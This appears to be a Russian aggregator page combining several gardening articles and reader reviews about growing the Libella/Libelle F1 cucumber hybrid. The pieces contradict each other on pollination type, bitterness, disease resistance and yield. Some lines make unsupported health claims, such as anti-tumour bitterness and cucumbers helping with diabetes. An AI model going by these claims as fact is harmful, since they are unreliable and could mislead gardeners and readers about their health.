25 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Огурец либелла описание сорта фото отзывы

Особенности выращивания, характеристика и описание огурцов сорта Либелла F1

Время на чтение: 9 минут

Многие урожайные сорта огурцов, которые были выведены еще во второй половине прошлого века, культивируются опытными огородниками по сей день. К таким культурам относится гибрид Либелла, который был зарегистрирован в 1976 году. Растение сразу же завоевало признание и получило широкое распространение среди аграриев. И даже сегодня сорт огурцов Либелла выбирают прежде всего по причине минимальных затрат на уход, благодаря устойчивости к большинству болезней и отменных вкусовых качеств зеленцов.

Описание и характеристика огурца Либелла F1

Огурцы Либелла F1 – это среднеспелый гибрид партенокарпического класса, которому требуется опыление насекомыми. Отметка «F1» говорит о том, что собирать семена этого сорта для дальнейшего выращивания бесполезно, поскольку посадочный материал не наследует генетические признаки первичной селекции. Либеллу выращивают как в открытом грунте, так и тепличных условиях.

Внешние характеристики сорта:

  • зеленцы темно-зеленого окраса эллипсовидной формы;
  • поверхность огурцов покрыта мелкими колючками;
  • размеры плодов до 15 см, вес – до 150 г;
  • кожица тонкая, мякоть сочная, плотная и сладкая, присутствует хруст;
  • зеленцы отдают небольшой горчинкой (это указывает на концентрацию кукурбитацина – препарата с противоопухолевым эффектом);
  • вершины плодов помечены белесыми вкраплениями;
  • тип цветения преимущественно женский – с завязями;
  • листья среднего размера, края неправильной формы;
  • растение среднерослое, ветвистое с длинными плетями.

Назначение плодов – универсальное. Плодоношение длительное, начинается с 50 дня после всходов и продолжается до самой осени. В среднем можно собрать до 8 кг с одного квадратного метра. Наилучшие показатели урожайности отмечаются в Центральных и Северо-Западных регионах России, для которых и предназначено выращивание этого сорта. Дегустационная оценка сорта Либелла – 5 баллов. Из-за сильной ветвистости куст рекомендуется выращивать вертикальным способом, устанавливая опору.

Плюсы и минусы сорта

Сорт огурцов Либелла не одно десятилетие пользуется высоким спросом среди огородников.

Популярность объясняется характеристиками и преимуществами данной культуры:

  1. Универсальное использование зеленцов (как в свежем виде, так и для засолки).
  2. Отличная транспортабельность и долгий срок хранения урожая.
  3. Высокая оценка вкусовых качеств зеленцов.
  4. Можно использовать в коммерческих целях.
  5. Сильная иммунная система и устойчивость к нашествию вредителей.
  6. Возможность выращивания в холодных климатических зонах.
  7. Растению не требуется прищипывание.
  8. Доступен сбор зеленцов в виде корнишонов.
  9. Тип завязи – пучковый (в одном узле до трех единиц).
  10. Длительный срок плодоношения.
  11. Невысокая стоимость семян.

Но сорту Либелла присущи и негативные стороны: необходимость опыления пчелами, присутствие горчинки (особенно при недостаточном поливе), склонность к перерастанию, дефекты в окраске, что сказывается на товарном виде зеленцов. Также среди минусов можно выделить непереносимость жаркой погоды – если оставить огурцы под открытым солнцем, на их поверхности образуются белые пятна. В связи с этим при выращивании в открытом грунте сорт требует укрытия листвой. Кроме того, гибрид Либелла обладает слабой корневой системой, которую легко повредить при пересаживании.

Нюансы выращивания растения

При выращивании сорта огурцов Либелла следует учитывать, что его нельзя высаживать в закрытых теплицах без вентиляции, а также на балконах. Растению потребуется солнце и насекомые для опыления. Кроме того, нельзя удалять нижние побеги и цветки, поскольку именно из них растут огурцы. Верхнюю часть также нельзя прищипывать – на ней располагаются мужские цветки. Если потребуется ускорить период созревания, то следует применять рассадный способ выращивания.

Подготовка и посадка семян

Для начала следует определиться с участком – место должно быть без безветренным, вдали от скопления грунтовых вод и открытое для солнца. Также для выращивания огурцам не подходит кислая почва (потребуется внесение доломитовой муки или гашеной извести). Приобретенные семена в цветной оболочке не подлежат подготовке и проращиванию, поскольку они предварительно прошли обработку специальными составами. Такой посевной материал высеивают в сухом виде. Необработанные семечки сорта Либелла следует подготовить и прорастить.

Сперва посевной материал проходит сортировку: семена помещают в соленую воду и те из них, что всплыли наверх, выбрасывают. Далее проводят прогревание: семена 15 минут выдерживают в воде, температура которой 50 градусов. Так как Либелла устойчива к грибковым болезням и корневой гнили, сорт не требует предварительной обработки марганцовкой или медным купоросом. На пару дней семена можно поместить в стимулятор роста. Тара для посадки должна быть просторной (не менее 0,5 л), поскольку сорт плохо переносит пикировку. Семечки высеивают на глубину 1 см, в одну лунку кладут несколько штук.

Уход за рассадой

После высадки остается поддерживать оптимальные условия для роста здоровой рассады огурцов. Уход за растениями включает такие этапы:

  1. Высеянные в емкости семена укрывают пленкой, пластиковой крышкой или стеклом, затем убирают в теплое место. Каждый день горшочки нужно проветривать, а грунт увлажнять пульверизатором.
  2. Как только появятся первые всходы, емкости помещают в место с температурой воздуха не более 17 градусов. Это действие предотвращает вытягивание рассады.
  3. Спустя неделю температуру в помещении с рассадой огурцов Либелла повышают до 20 градусов. Кроме того, важно обеспечить достаточное освещение.
  4. К этому времени должны появиться первые ростки. Их нужно осмотреть и наиболее слабые срезать ножницами под корень, чтобы остался только один.
  5. Почва в емкостях должна быть влажной, но не мокрой. В теплую погоду растение поливают один раз в два дня, в жару – до двух раз за сутки.
  6. При недостатке солнечного света и пасмурной погоде рассаде огурцов может потребоваться дополнительное освещение.
  7. Как только появляется два настоящих листочка (важно отличать их от семядольных листиков), в почву с рассадой вносят удобрительную смесь. На один литр воды разводят чайную ложку нитрофоски.

Важно не допускать перерастания рассады, поскольку она хуже приживется на участке – растение будет часто болеть или погибнет. За неделю до высадки следует начать закалять рассаду зеленцов, чтобы «приучить» ее к уличным условиям.

Высадка в грунт

В конце апреля или начале мая рассаду или семена начинают высаживать в открытый грунт. Нельзя делать это раньше, чем пройдет угроза ночных заморозков (температура воздуха не должна опускаться ниже 12 градусов, в дневное время – не ниже 22). Схема высадки сорта огурцов Либелла:

  • почву перекапывают и вносят литр коровяка, медный купорос и куриный помет;
  • накрыть участок пленкой и выждать шесть суток;
  • лунки делают по схеме 50х30, расстояние между огуречными кустами – 30 см;
  • саженцы поливают и присыпают почвой.

Чтобы укрепить иммунную систему зеленцов перед высадкой, грунт необходимо насытить перегноем.

Сорт огурцов «либелла»: описание, отзывы

Садоводы выращивают на своих приусадебных участках различные овощные, фруктовые и ягодные культуры. У всех совершенно разные вкусы и пристрастия. Но вот огурцы пользуются особой популярностью абсолютно у всех любителей огородной деятельности. Из них весь сезон приготавливают различные салаты, а на зиму готовят всевозможные соленья и закуски. Получается, огурцы кормят нас круглый год.

Способы выращивания этой овощной культуры каждый выбирает сам. Кто-то предпочитает тепличный метод, другие сажают огурцы в открытый грунт.

Но все-таки важным остается правильно выбрать сорт семян. Все чаще при посадке стали использовать семена огурцов «либелла». И это вполне заслуженно. У сорта высокие показатели урожайности, а также положительные вкусовые качества. Он проверен временем. Сорт выведен селекционерами Германии и с 1976 года пользуется популярностью.

Характеристики сорта огурцов «либелла»

Описание сорта стоит начать, в первую очередь, с обильного урожая и хорошей устойчивости к болезням. Но и кроме этих достоинств есть много других плюсов.

Сорт огурцов гибридный, что характеризует быстрые темпы роста плетей и созревания плодов. Для опыления огурцы нуждаются в пчелах. Стебель довольно раскидистый, с мощной структурой. Имеет большое количество листьев и завязей. Относится к среднеспелым видам. От всходов до начала плодоношения требуется в среднем 50 дней.

Огурцы «либелла»: описание плодов

Плод крупный и бугристый. Цвет огурца темно-зеленый. Длина плода 13-15 см, масса около 100-150 грамм. Мякоть светлая, плотная и сочная. Огурцы используются в пищу как в свежем виде, так и в консервированном.

Конечно, как и у всех сортов есть свои минусы:

  • при несвоевременном сборе урожая происходит быстрое перерастание;
  • нередко присутствует небольшая горечь;
  • порой товарный внешний вид огурцов портят белесые пятна.

Хотя знатоки утверждают, что горечь — это плюс, а не минус. Во-первых, легкая горчинка придает некую пикантность блюдам. Во-вторых, в горечи присутствует элемент с противоопухолевым действием.

Подготовка семян

Опытные садоводы придерживаются мнения, что выдержка семян данного сорта должна длиться 3-4 года. Поэтому, если нет возможности или желания по правилам хранить семена, то лучше их приобрести.

Семена, покрытые специальной оболочкой, сразу высаживаются в грунт. Если оболочка отсутствует, то их лучше перед посадкой на 15-20 минут замочить в горячей воде. Вместо воды можно использовать слабый раствор марганцовки. Это позволит обеззаразить семена. Большинство садоводов перед посадкой проращивают семена. Для этого их нужно окутать тканью и замочить теплой водой. Через несколько дней появятся ростки. При таком способе посадки всходы появятся намного быстрее.

Но нужно помнить, что семена с оболочкой проращивать нельзя.

Если предполагается вырастить рассаду заранее, а после высаживать в открытый грунт, то целесообразно посеять семена в торфяные горшочки. А после без ущерба для растения провести посадку.

Правила посадки

Перед посадкой необходимо подготовить почву. Обязательно нужно внести перегной. Плодородная почва напрямую влияет на обильность будущего урожая. Идеальной средней температурой для выращивания огурцов является +25 градусов. Почва должна быть прогретой. Если посеять семена в холодный грунт, то огурцов ждать не придется.

Для подстраховки можно в каждую лунку кинуть не одно, а 2-3 семечка. Но между ними оставить небольшие расстояния. Глубина посадки не должна превышать 2 см. На 1 квадратный метр высаживается не более 4 растений. После проводится полив средней интенсивности и укрывается пленкой. Окончательно снимается укрытие после того, как ночная температура стала достаточно стабильна и не менее 15 градусов.

Рассада сорта огурцов «либелла» высаживается в основном в открытый грунт. В прохладное лето идеально растет под пленкой с регулярным проветриванием.

Уход и его особенности

Огуречная культура любит свет, тепло и влагу. Надземная часть растения развита очень хорошо, поэтому испарение влаги происходит активно. Следует регулярно следить за увлажнением почвы и не допускать ее пересыхания. Но это не значит, что место, где растут огурцы, нужно превращать в болото.

Полив проводят теплой водой под корень, и плоды будут здоровыми, как на фото.

Огурцы «либелла» в прохладную погоду поливают понемногу. В противном случае может образоваться гниль.

Чегоо не любят огурцы:

  1. Очень плохо переносят пересадку. В большинстве случаев растение гибнет.
  2. Кислая почва не для огурцов. Поэтому нужно следить за этим. Устранить проблему можно путем внесения извести.
  3. При необходимости регулярно следует проводить рыхление почвы. Плотный грунт губителен для огурцов.
  4. Плохо переносят резкие перепады температуры. Если днем достаточно тепло, а ночи холодные, следует укрывать плети в вечернее время.
  5. Для посадки важно выбрать место с отсутствием сквозняков.

Длинные плети огурцов «либелла» можно подвязывать. Так будет удобнее собирать урожай.

Если при посадке вносился торф или перегной, то подкормка водится спустя 2 недели после всходов. Подкармливать огурцы нужно раз в неделю. Следует чередовать минеральные удобрения с органическими. Если есть зола и коровяк, то просто замечательно. Они вносятся в почву поочередно.

Не стоит проводить подкормку конским навозом. Могут ухудшиться вкусовые качества огурцов.

Болезни и вредители

Огурцы «либелла» имеют среднюю сопротивляемость заболеваниям. Очень важно не допускать переохлаждения. При температуре ниже +10 градусов начинают развиваться различные болезни. В последнее время самым распространенным заболеванием является мучнистая роса. Болезнь может проявить себя на любой стадии роста огурца. Чаще всего это время приходится на период плодоношения. Инфекция в почве сохраняется долгое время.

Основные признаки мучнистой росы:

  • появление маслянистых пятен зеленого цвета, которые со временем заметно увеличиваются;
  • листья приобретают коричневый цвет похожий на ожог;
  • по прошествии 2-3 дней растение полностью высыхает.

Причиной заболевания могут стать перепады температур, полив холодной водой или обильные дожди в холодную погоду. В теплицах также встречается подобное заболевание. Возникает от наличия конденсата.

При первых признаках заболевания срочно прекратить полив и отменить внесение удобрений. Через неделю опрыскать плети хлорокисью меди.

Отзывы о сорте

Так как сорт не новый, то много о нем и отзывов. Огурцы «либелла» оцениваются крайне положительно. Садоводов впечатляет обильный урожай гибридного сорта. Также ценится стойкость к различным заболеваниям.

Попробовав вырастить на своем участке такой сорт огурцов, садовод обязательно останется доволен. Осуществляя правильный уход за растением, после он будет наслаждаться обильным урожаем.

Один из лучших гибридов огурцов Либелле F1

В обществе авторитет и репутация нарабатываются годами, и огуречный «мир» не является исключением. Есть гибриды и сорта, которые, несмотря на свой возраст (а, возможно и благодаря такой проверке временем) являются фаворитами у дачников. Итак, представляем описание популярного сорта Либелле F1, некоторые особенности агротехники и фото!

Гибрид Либелле F1 – огурец с авторитетом

Можно увидеть различное написание этого мудреного красивого названия: Либелле, огурец сорта Либелла, но знайте, что речь идет про один и тот же гибрид. Он был внесен в список Госреестра еще в 1976 году, и вот уже на протяжении четырех десятков лет радует огородников отличными урожаями.

Гибрид является среднеспелым, сроки созревания зеленцов варьируются от 45 до 55 дней. Рекомендован для выращивания на грядах, под укрытиями, в теплицах.

НА ЗАМЕТКУ! Либелле F1 опыляется насекомыми, потому необходимо обеспечить присутствие на участке пчелок и шмелей.

Куст гибрида рослый, с длинными плетьми (смотри фото куста). Рекомендуется высаживать на 1 м2 не более трех растений и это правило желательно выполнять. Плоды довольно крупные, удлиненные (до 15 см), весят до 120-140 граммов. Этот гибрид очень урожайный, поэтому в период массового плодоношения сбор зеленцов требуется проводить почти каждый день.

Огурчики Либелле имеют темно-зеленую окраску, ярко выражены продольные полосы желтого или белесого цвета.

Мякоть очень сочная, с характерным сладким привкусом, хрустящая. Семян внутри много, но они очень мелкие и практически не ощущаются.

Где используются зеленцы гибрида? Салаты, консервация, засолка (только снимать надо, когда огурчики имеют небольшие размеры), всевозможные маринады – этот огурец хорош везде. Либелле F1 – достаточно лежкий гибрид, и судя по отзывам, пригодный к транспортировке.

За что ценят гибрид огурца Либелле?

Огурчик выращивают в самых разных регионах страны, и это только доказывает его популярность. Какие сильные стороны гибрида, в чем его «плюсы»?

  1. Либелле F1 отличается очень высокой урожайностью. В теплице при условии правильной агротехники можно собрать до 20 кг с 1 м2, а открытом грунте результаты будет скромнее (до 12 кг).
  2. Неприхотливость.
  3. Устойчивость к перепадам температур, похолоданиям.
  4. Отличный вкус (даже при небольшом перерастании зеленцов вкусовые качества остаются на уровне).
  5. Великолепный товарный вид огурцов (согласитесь, это тоже немаловажно).
  6. Стойкость к болезням.
  • если огурцы выращиваются для засолки и консервации, надо контролировать сбор, так как они быстро вырастают до 14-15 см и становятся великоваты;
  • гибрид требователен к хорошему питанию (в обязательном порядке нужны подкормки).

Сложно сказать, можно ли это считать недостатками, скорее особенностями выращивания данного гибрида.

Посадка и уход: правила, рекомендации

Во всех регионах Урала, Сибири, а также Европейского Севера гибрид выращивается через рассаду. Можно, конечно же, поступить как на юге – посеять семена сразу в грунт. Но, во-первых, раньше конца мая или начала июня сделать это не получится из-за особенностей климата. Во-вторых, посев в грунт замедляет получение первых спелых плодов.

Выращивание рассады

Для огурчиков готовят горшочки, стаканчики с питательным грунтом, куда высевают семена.

НА ЗАМЕТКУ! Семена гибридов (в том числе и огурца Либелле F1) не нуждаются в предпосевной обработке.

Сроки посева зависят от климата региона, главное, чтобы при высадке рассады ее возраст был около 22-25 дней. Обычно сроки приходятся на последние числа апреля или первые дни мая.

Рассаде требуется регулярный полив (лучше из пульверизатора), две-три подкормки. Перед высадкой (дней за 5-6) практикуют закаливание сеянцев, когда растения выносят на открытые балконы, лоджии или веранды.

Уход за огурцами

Высадка огурчиков на постоянное место проводится, только когда уйдут холода, почва прогреется и установится стабильное тепло.

ВАЖНО! Почва должна прогреться до температуры +14…+16ºС.

При выборе шпалерного способа выращивания (а он является для этого гибрида самым оптимальным) заранее устанавливают опоры и натягивают проволоку.

Схема высадки – по три растения на одном квадратном метре. Загущать не стоит, иначе взрослым кустам с плодами не будет хватить питания и света.

Все знают, что огурцы – водохлебы, и нуждаются в обильных регулярных поливах. Недостаток влаги сказывается на состоянии самих растений, росте и качестве зеленцов. В то же время нельзя допускать переизбытка влаги, так как в этом случае растения могут подхватить различные болезни.

  1. до цветения – раз в 5-6 дней в пасмурную погоду, и чаще (до двух трех раз) в ясные и жаркие дни;
  2. в фазе плодоношения поливают каждые два-три дня, ориентируясь на состояние растений, погоду.

Поливать лучше всего в утренние часы, не допуская попадания воды на листья огурцов.

Подкормки

Выше уже было сказано, что заявленных в характеристике показателей урожайности можно добиться только при условии хороших подкормок огурца.

«Обеды» для растений устраивают каждые 10-14 дней. Первую подкормку проводят не ранее чем через две недели после высадки рассады. Используют органику, а вот в период бутонизации и начала плодоношения вносят фосфор и калий.

НА ЗАМЕТКУ! Хороший эффект дает чередование органики и минеральных удобрений. При этом важно соблюдать нормы внесения веществ.

Вместо «минералки» можно заделывать в почву древесную золу или поливать огурцы ее настоем.

При выращивании на шпалере гибрид Либелле необходимо направлять вверх и подвязывать побеги.

Профилактика болезней

Несмотря на то, что Либелле F1 устойчив к болезням, про меры профилактики забывать не стоит. И на первом месте будет стоять точное соблюдение всех правил выращивания, севооборота овощных культур (это касается не только огурцов), правильного полива.

ВАЖНО! Часто огурцы поражаются болезнями из-за неправильного ухода за растениями.

От вредителей помогают обработка настоями чеснока, бордоской жидкостью, настоем табачной пыли и мыла.

Сбор урожая

Огурцы Либелле плодоносят очень обильно. Дачникам надо помнить про своевременный сбор зеленцов, так как каждый переросший огуречик будет тормозить развитие и рост последующих плодов.

Снимают плоды очень аккуратно, используя секатор или вывинчивая плоды.

Опытные огородники рекомендуют гибрид Либелле F1 для выращивания во всех регионах. Может быть, стоит прислушаться к советам «бывалых»?

Огурец «Либелле F1»: описание гибридного сорта, фото и отзывы

С этим сортом давно и хорошо знакомы многие огородники всего постсоветского пространства. Гибрид зарегистрирован в Госреестре еще в 1976 году как рекомендованный для выращивания в открытом грунте Северо-Западного и Центрального регионов, а в 2011 году под названием «Либелла F1» он был внесен в Госреестр сортов Беларуси. Авторство выведения гибрида принадлежит селекционерам компании «Satimex Quedlinburg GMBH» (Германия). В этой статье мы подробно расскажем об особенностях сорта огурцов «Либелле F1».

Сорт подходит как для приусадебного возделывания, так и для коммерческого производства, особенно во втором (летне-осеннем) обороте. Долгое время данный гибрид входил в число традиционных луховицких огурцов, активно выращиваемых в подмосковных фермерских хозяйствах. Благодаря выносливости и урожайности на открытом грунте, отличным вкусовым качествам огурцы «Либелле F1» остаются востребованными и популярными в течение многих лет.

Условием хорошей урожайности пчелоопыляемых огурцов служит достаточное количество насекомых. Поэтому сажать данный сорт в защищенный грунт имеет смысл, если у вас имеются свои ульи или же поблизости находится пасека. Чтобы обеспечить доступ насекомых-опылителей, в солнечную погоду необходимо постоянно проветривать теплицу, держа дверь открытой.

Для привлечения насекомых в теплицу некоторые садоводы рекомендуют рядом с огурцами посадить растения-медоносы с насыщенным ароматом (жасмин, гречиху, вереск, петунью и др.) или ставить в ведро с водой срезанные ветки цветущих деревьев (липы, абрикоса, груши и т. д.).

Основные характеристики

В числе достоинств гибрида огурцов «Либелле F1» можно выделить:

Дегустационная оценка зеленцов – 5 баллов (наивысшая), используются для употребления в пищу в свежем виде и подходят для всех способов консервирования

Характеристика Показатели
Сроки созревания Среднеранний: плодоношение начинается с 49-52-го дня после полных всходов
Урожайность В среднем 6-8 кг/м 2 , максимально – до 10 кг/м 2 в открытом грунте при выходе товарной продукции на уровне порядка 75%
Высокие вкусовые качества и универсальность назначения зеленцов
Устойчивость к болезням Устойчив к оливковой пятнистости (кладоспориозу) и ложной мучнистой росе (пероноспорозу)

Описание

Как уже упоминалось, гибрид «Либелле F1» относится к категории пчелоопыляемых. На растении присутствуют цветки обоих полов, но преимущественно женские – с завязями.

Растение индетерминантное, среднерослое, ветвистое и динноплетистое. Листья среднего размера, округлой формы, морщинистые, с неправильно-пильчатыми краями. Для удобства в уходе и уменьшения риска заболеваний кусты рекомендуют выращивать вертикальным методом, пуская плети на опору, чтобы они хорошо проветривались и равномерно освещались. Первый урожай зеленцов формируется к 49-52-му дню после всходов (среднеранний), но благодаря развитию мощных боковых побегов основной пик плодоношения с массовым созреванием плодов приходится на конец лета. В среднем товарная урожайность составляет 6,6 кг/м 2 (максимальная – до 10 кг/м 2 ) при выходе качественной продукции на уровне 74,3%.

Завязи – овальные, густо покрытые белесыми шипами. Зеленцы в стадии потребительской (технической) спелости достигают длины 12-14 см и массы 90-150 г. Имеют удлиненно-эллипсовидную или цилиндрическую форму со слабой ребристостью, темно-зеленую окраску со светлой верхушкой и короткими продольными полосами. Кожура тонкая, покрыта частыми мелкими бугорками и белым опушением. Мякоть сочная и хрустящая, с мелкими семенами. Вкус нежный и сладковатый, отмеченный наивысшими дегустационными оценками.

По назначению огурцы универсальные, то есть плоды хороши в свежем виде (салатные) и пригодны для всех способов переработки (засолочные, консервные).

Огурец «Либелле F1», по отзывам многих огородников, имеет следующие недостатки:

  • склонность к быстрому перерастанию;
  • появление горечи при недостаточном поливе в засушливые периоды;
  • дефекты в окраске (белесые бока и пятна) при неравномерной освещенности.

Данный гибрид заслуженно пользуется большим спросом, поэтому получением и выпуском семенного материала занимаются многие отечественные производители («Гавриш», «СеДеК», «Семетра», «Аэлита» и т. д.). По сравнению с другими более современными гибридами зарубежной селекции стоимость семян этого сорта значительно ниже. Семенной материал гетерозисных гибридов, маркируемых обозначением «F1», с созревших огурцов не собирают, потому что сочетание улучшенных качеств последующим поколениям не передается. Для выращивания гибридных сортов огурцов используют только покупные семена.

Гибрид характеризуется устойчивостью к распространенным болезням, таким как оливковая пятнистость (кладоспориоз) и ложная мучнистая роса (пероноспороз).

Популярность огурца «Либелле F1» послужила стимулом для дальнейшей селекции. Союзом производителей семян «Ассоциация Биотехника» (г. Санкт-Петербург) был создан дочерний гибрид «Ла Белла F1», внесенный в Госреестр в 2006 году. Его отличительными чертами являются:

  • повышенная адаптированность к российским климатическим условиям (Северного, Северо-Западного, Центрального, Волго-Вятского, Центрально-Черноземного, Северо-Кавказского, Средневолжского регионов);
  • пучковое заложение завязей (1-3 в узле);
  • корнишонный тип зеленцов (масса в среднем 65-70 г);
  • генетическое отсутствие горечи в плодах;
  • устойчивость к настоящей мучнистой росе.

Отзывы

Татьяна, 48 лет, г. Нижний Новгород

Мы выращиваем овощи на продажу и постоянно пробуем новые сорта и гибриды. При огромном разнообразии покупатели часто спрашивают именно огурец Либелле. Его основной урожай мы собираем в конце лета – начале осени, когда идет самый горячий сезон домашних заготовок на зиму. Поэтому как начали высаживать этот гибрид уже больше 20 лет назад, так и будем сажать дальше.

Жанна, 54 года, Калужская обл.

Одним из самых вкусных и урожайных огурцов на открытом грунте для меня был и остается сорт Либелле Ф1. Очень активно и долго плодоносит, мало болеет, в уходе некапризный. Поливать при жаре приходится постоянно, иначе огурчики могут горчить. И снимать их нужно вовремя, чтобы не перерастали и не желтели. Если где пропустишь такой переросток, так он на себя всю силу с плети забирает и новым завязям наливаться не дает.

Родион, 41 год, г. Гомель (Беларусь)

Мне сорт огурцов Либелла F1 посоветовали родители. Сажал его в прошлом году. Остался доволен вкусовыми качествами и размерами зеленцов. Они хорошо подходят для всех летних салатов и домашнего консервирования. Огурцы у меня росли в открытом грунте без опор и подвязывания. Плети расползались прямо по земле. Прищипывал их только по необходимости. Листва оставалась зеленой и здоровой все лето. Ни болезни, ни паразиты на нее не нападали. Влажность у нас достаточно высокая, но в жару приезжали на дачу каждый вечер поливать огурцы. Когда был прохладный период и мало солнца, на кустах появлялось больше пустоцветов и завязи опадали. На плодах, прикрытых листьями, часто оставались светлые участки в виде пятен. Но в целом мне этот сорт понравился своей урожайностью и неприхотливостью.

Полина, 34 года, Московская обл.

У нас в Луховицах огурцы особенно вкусные. Выращиваем мы в основном проверенные, высокоурожайные гибриды. Из современных тепличных партенокарпиков предпочитаем Трилоджи и Монолит, а из старых пчелоопыляемых – Либеллу. Она отлично плодоносит на открытых грядах, дает стабильно хороший и долгий урожай. Огурцы внешне красивые, усеянные мелкими пупырышками и белыми неколючими шипами, по вкусовым качествам замечательные, по плотности – упругие и хрустящие. Хорошо транспортируются и хранятся. Разбирают их быстро и в больших количествах на консервацию.

Таисия, 62 года, г. Рыбинск

Привычные и любимые огурцы Либелле и Родничок всегда обеспечивают меня свежими витаминами и зимними заготовками. Посадки хорошо растут вместе. Огурчики очень вкусные и хрустящие, даже те, что с горчинкой, отлично просаливаются и маринуются. Нравится, что они основной урожай отдают дружно и ближе к осени. За лето успеваем ими наесться, а потом сразу набрать нужное количество на всю консервацию.

Видео

С процедурой проверки семян гибридного сорта огурцов «Либелле F1» от агрофирмы «Поиск» можно ознакомиться в следующем сюжете:

Несколько лет работала в качестве редактора телевизионной программы с ведущими производителями декоративных растений в Украине. На даче из всех видов аграрных работ предпочитает сбор урожая, но ради этого готова регулярно полоть, тяпать, пасынковать, поливать, подвязывать, прореживать и т. д. Убеждена, что самые вкусные овощи и фрукты – выращенные своими руками!

Нашли ошибку? Выделите текст мышкой и нажмите:

Один из самых удобных методов заготовить выращенный урожай овощей, фруктов и ягод – заморозка. Некоторые полагают, что замораживание приводит к потере питательных и полезных свойств растительных продуктов. В результате проведенных исследований ученые выяснили, что снижение пищевой ценности при заморозке практически отсутствует.

Перегной – перепревший навоз или птичий помет. Готовят его так: навоз складывают в кучу или бурт, переслаивая его опилками, торфом и огородной землей. Бурт накрывают пленкой, чтобы стабилизировать температуру и влажность (это нужно для повышения активности микроорганизмов). Удобрение «созревает» в течение 2-5 лет – в зависимости от внешних условий и состава исходного сырья. На выходе получается рыхлая однородная масса с приятным запахом свежей земли.

Фермер из Оклахомы Карл Бернс вывел необычный сорт разноцветной кукурузы, получивший название Rainbow Corn («радужная»). Зерна на каждом початке – разных цветов и оттенков: коричневые, розовые, фиолетовые, голубые, зеленые и др. Такого результата удалось добиться путем многолетнего отбора наиболее окрашенных обычных сортов и их скрещивания.

В Австралии ученые начали эксперименты по клонированию нескольких сортов винограда, произрастающих в холодных регионах. Потепление климата, которое прогнозируют на ближайшие 50 лет, приведет к их исчезновению. Австралийские сорта имеют отличные характеристики для виноделия и не подвержены распространенным в Европе и Америке заболеваниям.

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Никакой природной защиты у томатов от фитофтороза нет. Если фитофтора нападает, гибнут любые помидоры (и картошка тоже), что бы ни было сказано в описании сортов («сорта, устойчивые к фитофторозу» – лишь маркетинговый ход).

Новинка американских разработчиков – робот Tertill, выполняющий прополку сорняков в огороде. Прибор придуман под руководством Джона Доунза (создателя робота-пылесоса) и работает при любых погодных условиях автономно, передвигаясь по неровной поверхности на колесах. При этом он срезает все растения ниже 3 см встроенным триммером.

Природные токсины содержатся во многих растениях; не исключение и те, которые выращивают в садах и на огородах. Так, в косточках яблок, абрикосов, персиков есть синильная (цианистоводородная) кислота, а в ботве и кожуре недозревших пасленовых (картофеля, баклажанов, помидоров) – соланин. Но не стоит опасаться: их количество слишком незначительно.

Родина перца – Америка, но основные селекционные работы по выведению сладких сортов проводились, в частности, Ференцем Хорватом (Венгрия) в 20-х гг. XX века в Европе, преимущественно на Балканах. В Россию перец попал уже из Болгарии, потому и получил свое привычное название – «болгарский».

Подарок от немецких селекционеров — огурцы «Либелла» (Либелле)

Огуречный гибрид Либелле известен преимущественно в европейской части России. Это одна из самых урожайных культур, выращиваемых в нашей стране. При этом его культивация не представляет особых трудностей — главное знать основные правила и тонкости, о которых мы расскажем далее.

Описание гибрида

Либелле F1 — среднеспелый гибрид первого поколения, выведенный селекционерами из Германии. Его выращивают преимущественно в Центральном и Северо-Западном районах России.

Состав и польза огурцов

100 г огурцов содержат:

  • вода — 90-95 г;
  • белки — 0,6 г;
  • жиры — 0,1 г;
  • углеводы — 3,6 г;
  • калорийность — 15 ккал.

Огурцы содержат витамины и микроэлементы (йод, медь, марганец, фосфор). Эти вещества благотворно влияют на организм:
  • способствуют усвоению пищи;
  • понижают уровень кислотности желудка;
  • помогают при заболеваниях почек и печени, ревматизме и сахарном диабете;
  • улучшают работу щитовидной железы.

Характеристики

Корневая система огурцов развита слабо, уходит в землю неглубоко. Кусты покрыты большим количеством листьев с большой площадью листовой пластины. Плоды, имеющие вытянутую форму, в созревшем виде достигают длины в 10-15 см и массы в 0,1-0,15 кг.

Поверхность плодов покрыта небольшими бугорками и маленькими белыми шипами. Имеют сочную, хрустящую и приятную на вкус мякоть без горького привкуса.

Либелле примечательна высокой урожайностью. При хорошем уходе и благоприятных условиях с одного растения за сезон можно собрать до 4-5 кг (максимум — 8-10 кг) плодов. При выращивании в открытом грунте такой высокий результат не всегда достижим.

Как вырастить самостоятельно

Огурцы можно высаживать семенами или предварительно выращенной рассадой. В условиях российского климата для получения раннего урожая дачники используют преимущественно рассаду, выращенную на подоконнике.

Посадка

Для выращивания рассады подготавливают торфяные таблетки или стаканчики достаточного объема и субстрат. В качестве последнего подойдет овощная почвенная смесь, купленная в магазине, или почва с вашего участка, прошедшая прокаливание и дезинфекцию.

Перед посевом посадочный материал сортируют, погружая в соленую воду (столовая ложка соли на стакан теплой воды). Семена, всплывшие наверх, выбрасывают, остальным дают просохнуть и высаживают в горшочки (при выращивании через семена — напрямую в открытый грунт).

Внимание! При распаковке семян, приобретенных в магазине, обратите внимание на их внешний вид. Семена, покрытые цветной оболочкой, уже подвергались обработке. Семена без оболочек перед посадкой вымачивают в растворе марганца или в горячей воде (+50-55 °C) в течение 20 минут, чтобы дезинфицировать их поверхность.

На рубеже апреля и мая рассаду или семена можно пересаживать в открытый грунт. Это делают не раньше, чем на растении сформируются несколько полноценных листиков, а за окном установится теплая погода без ночных заморозков. Огуречную грядку желательно расположить в незатененном и непродуваемом месте.

Перед посадкой верхний слой почвы рыхлят, места для лунок глубиной в 1,5-2 см намечают на расстоянии не менее 30 см друг от друга. На 1 кв. м. грядки разместятся 3-4 растения. Вместе с семенами или рассадой в лунки кладут немного перепревшего компоста.

Пересадка рассадой переносится растениями болезненно, поэтому ее сажают вместе с земляным комом, аккуратно извлеченным из горшочка (при необходимости размеры лунок расширяют). В этом смысле посадка торфяными таблетками предпочтительнее.

Выращивание и уход

После посадки семена или саженцы поливают теплой водой. В первые дни на ночь грядку накрывают плотной тканью, чтобы защитить огурцы от холода.

Оптимальная температура воздуха – +25-27 °C, почвы — +20 °C. При падении температуры воздуха ниже отметки в +10 °C урожайность и иммунитет растения резко ослабевают, рост замедляется. При температурах выше +35 °C оплодотворение становится невозможным.

